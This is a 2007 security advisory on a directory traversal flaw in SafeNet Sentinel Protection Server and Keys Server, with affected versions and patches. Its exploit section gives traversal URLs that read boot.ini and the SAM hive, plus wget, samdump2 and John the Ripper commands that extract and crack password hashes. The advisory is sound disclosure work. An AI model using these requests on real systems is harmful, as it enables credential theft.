Directory Traversal in SafeNet Sentinel Protection Server and Keys Server

2007-11-27T00:00:00
ID SECURITYVULNS:DOC:18514
Type securityvulns
Reporter Securityvulns
Modified 2007-11-27T00:00:00

Description

SUMMARY

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server products include web servers which are vulnerable to directory traversal attacks. A remote attacker could exploit these vulnerabilities to read arbitrary files with the permissions of the web server, typically SYSTEM.

AFFECTED SOFTWARE

  • Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
  • Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED

  • Sentinel Protection Server 7.4.1
  • Sentinel Keys Server 1.0.4

IMPACT

A remote attacker could exploit this vulnerability to read sensitive files on the affected system. Attractive targets include the SAM registry hive which contains system password hashes.

DETAILS

Sentinel Protection Server and Sentinel Keys Server run web servers on ports 6002 and 7002, respectively, to allow remote monitoring of key use. The web server software does not santize request paths correctly before using them in system calls. As a result, an attacker can request files outside the web server's directory root by using the ../ notation to refer to the parent directory of the current directory.

SOLUTION

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server 1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT

Most popular web browsers are not be able to display URLs exploiting this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the system's local password hashes for offline cracking. For example, using the bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam $ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system $ bkhive system keyfile $ samdump2 sam keyfile > hashes $ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php http://www.openwall.com/john/

ACKNOWLEDGMENTS

Thanks to SafeNet for patching this vulnerability and for working with me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally discovered this problem on October 10th, 2007. I discovered the same vulnerability independently on October 29th, 2007. I have no reason to doubt Digital Defense, Inc.'s claim, and do not claim to have discovered the problem first.

REVISION HISTORY

2007-11-26 original release

-- Elliot Kendall <ekendall@brandeis.edu> Network Security Architect Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/